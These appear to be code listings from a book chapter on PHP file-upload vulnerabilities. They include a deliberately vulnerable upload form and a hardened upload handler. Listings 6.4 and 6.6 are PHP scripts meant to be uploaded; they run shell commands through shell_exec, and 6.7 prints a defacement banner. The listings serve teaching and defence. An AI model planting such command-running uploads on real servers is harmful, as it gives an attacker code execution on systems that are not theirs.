Sinha_ch06_Codes
//code 6.1
<!--
  Listing 6.1: the upload form of the vulnerable example. It posts one file
  field ("uploaded") back to the same page as multipart/form-data.
  Review notes:
  - MAX_FILE_SIZE is a hidden field sent by the browser. PHP treats it as
    advisory only and a client can change or drop it, so it is not a size
    control; the limit has to be enforced by the server.
  - Nothing in this markup restricts the file type. Whatever is allowed or
    rejected is decided by the server-side handler, which is not shown here.
-->
<div class="vulnerable_code_area">
<form enctype="multipart/form-data" action="#" method="POST" />
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose an image to upload:
<br />
<input name="uploaded" type="file" /><br />
<br />
<input type="submit" name="Upload" value="Upload" />
</form>
</div>
--------------------
//code 6.2
//index.php
<!--
  Listing 6.2 (index.php): posts a single file field, "uploadedFile", to
  upload.php as multipart/form-data, together with the "uploadBtn" submit value.
  The form carries no type or size restriction of its own, and any such
  attribute would only be a browser hint; every check that matters has to be
  made in upload.php on the data actually received.
-->
<form method="POST" action="upload.php" enctype="multipart/form-data">
<div>
<span>Upload a File:</span>
<input type="file" name="uploadedFile" />
</div>
<input type="submit" name="uploadBtn" value="Upload" />
</form>
----------------------
//code 6.3
//upload.php
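<?php
// upload.php - receives the "uploadedFile" field posted by the index.php form.
//
// In $_FILES the 'name' and 'type' entries are supplied by the client and can
// hold anything. This handler therefore:
//   1. takes only the last extension of the client file name,
//   2. checks it against an allow-list (strict comparison),
//   3. checks that the content type detected on the server matches it,
//   4. stores the file under a name generated on the server.
// The client-sent 'type' header is deliberately not read.
// No explicit size cap is applied here; the effective limit is PHP's
// upload_max_filesize / post_max_size configuration.
if (isset($_FILES['uploadedFile']) && $_FILES['uploadedFile']['error'] === UPLOAD_ERR_OK)
{
    $fileTmpPath = $_FILES['uploadedFile']['tmp_name'];
    $fileName = $_FILES['uploadedFile']['name'];
    $fileNameCmps = explode(".", $fileName);
    $fileExtension = strtolower(end($fileNameCmps));

    // Allowed extensions, each mapped to the MIME type its content must have.
    $allowedMimeTypes = array(
        'jpg' => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'gif' => 'image/gif',
        'png' => 'image/png',
    );
    $allowedfileExtensions = array_keys($allowedMimeTypes);

    // checking if file has one of the allowed extensions (third argument
    // true = strict comparison, no type juggling)
    if (in_array($fileExtension, $allowedfileExtensions, true))
    {
        // Detect the type from the bytes of the temporary file. This looks at
        // the file's signature only: a file can pass and still carry extra
        // data, so the upload directory must also never execute scripts.
        $finfo = new finfo(FILEINFO_MIME_TYPE);
        $detectedType = $finfo->file($fileTmpPath);

        if ($detectedType !== $allowedMimeTypes[$fileExtension])
        {
            echo 'Upload failed. File content does not match an allowed image type.';
        }
        else
        {
            // Server-generated name: nothing from the client name survives
            // except the allow-listed extension. md5(time() . name) was
            // guessable and collided for same-name uploads in one second.
            $newFileName = bin2hex(random_bytes(16)) . '.' . $fileExtension;
            // directory in which the uploaded file will be moved
            $uploadFileDir = './uploaded_files/';
            $dest_path = $uploadFileDir . $newFileName;
            // move_uploaded_file() refuses paths that are not genuine uploads
            if (move_uploaded_file($fileTmpPath, $dest_path))
            {
                echo 'File is successfully uploaded.';
            }
            else
            {
                echo 'There was some error moving the file to upload directory. Please make sure the upload directory is writable by web server.';
            }
        }
    }
    else
    {
        echo 'Upload failed. Allowed file types: ' . implode(',', $allowedfileExtensions);
    }
}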
---------------------------
// code 6.4
<?php
// Listing 6.4: runs four fixed commands through shell_exec() and prints what
// each one returned inside a <pre> element, separated by <hr>.
// NOTE(review): presumably this is the file the chapter uploads through the
// unrestricted form - confirm against the book text.
// Defender's view: the script has an effect only where the server executes
// PHP from the location the file ends up in and shell_exec() is not listed in
// php.ini's disable_functions. In process and file monitoring it appears as
// the web-server account spawning ls, mkdir, cal and pwd, and as a new
// "hacker" directory in the process's working directory.
$output1 = shell_exec('ls -la');
// mkdir normally prints nothing when it succeeds, so $output2 is expected to
// be empty in that case.
$output2 = shell_exec('mkdir hacker');
$output3 = shell_exec('cal');
$output4 = shell_exec('pwd');
// Command output is interpolated into the HTML as-is, with no escaping.
echo "<pre>$output1</pre>";
echo"<hr>";
echo "<pre>$output2</pre>";
// Printed unconditionally: the result of the mkdir call is never checked.
echo 'directory hacker created successfully';
echo"<hr>";
echo "<pre>$output3</pre>";
echo"<hr>";
echo "<pre>$output4</pre>";
?>
---------------------------
//code 6.5
//.htaccess
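# Default for this directory: refuse every request.
deny from all
# Exception: serve only files whose whole name is word characters, one dot and
# an image extension. \w does not match a dot, so a name with a second
# extension in front of the image one is not matched and stays denied.
# The backslashes matter: without them "w+" matches only the letter w and "."
# matches any character, so ordinary image names would not be re-allowed.
# Order/Allow/Deny are the Apache 2.2 access directives; on Apache 2.4 they
# need mod_access_compat (the native form is "Require all denied" /
# "Require all granted").
<files ~ "^\w+\.(gif|jpe?g|png)$">
order deny,allow
allow from all
</files>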
------------------------------
//code 6.6
<?php
// Listing 6.6: a shorter variant that runs two fixed commands through
// shell_exec() (a directory listing and a mkdir) and prints what they returned.
// Defender's view: it has an effect only if the server executes PHP from the
// directory the file is stored in and shell_exec() is not disabled through
// disable_functions. A web-server process spawning ls or mkdir, or a new
// "hacker" directory in the working directory, is the trace to look for.
$output1 = shell_exec('ls -la');
// mkdir normally prints nothing on success, so $output2 is expected to be empty.
$output2 = shell_exec('mkdir hacker');
// Command output is interpolated into the HTML as-is, with no escaping.
echo "<pre>$output1</pre>";
echo"<hr>";
echo "<pre>$output2</pre>";
// Printed unconditionally: the result of the mkdir call is never checked.
echo 'directory hacker created successfully';
echo"<hr>";
?>
-------------------------
//code 6.7
<?php
// Listing 6.7: prints one fixed heading and does nothing else. It reads no
// input and runs no command.
// NOTE(review): presumably a harmless marker used to show that an uploaded
// file is executed by the server - confirm against the book text. If the
// heading is rendered, the upload location is executing PHP; if the source
// text is shown or the request is refused, it is not.
echo "<h1>This site is hacked!</h1>";
------------------------
//code 6.8
<!--
  Listing 6.8: the same upload form after a submission, now followed by the
  application's response in the <pre> element.
  Review notes on that response:
  - A file with a .php extension was accepted, so the handler behind this form
    applied no effective extension or content check.
  - The message returns the relative path where the file was stored. A
    response should confirm the upload without disclosing the storage
    location, and uploads should live where the server will not execute them.
  - MAX_FILE_SIZE is a browser-sent hidden field and not a server-side limit.
-->
<div class="vulnerable_code_area">
<form enctype="multipart/form-data" action="#" method="POST" />
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose an image to upload:
<br />
<input name="uploaded" type="file" /><br />
<br />
<input type="submit" name="Upload" value="Upload" />
</form>
<pre>../../hackable/uploads/x.php succesfully uploaded!</pre>
</div>
----------------------------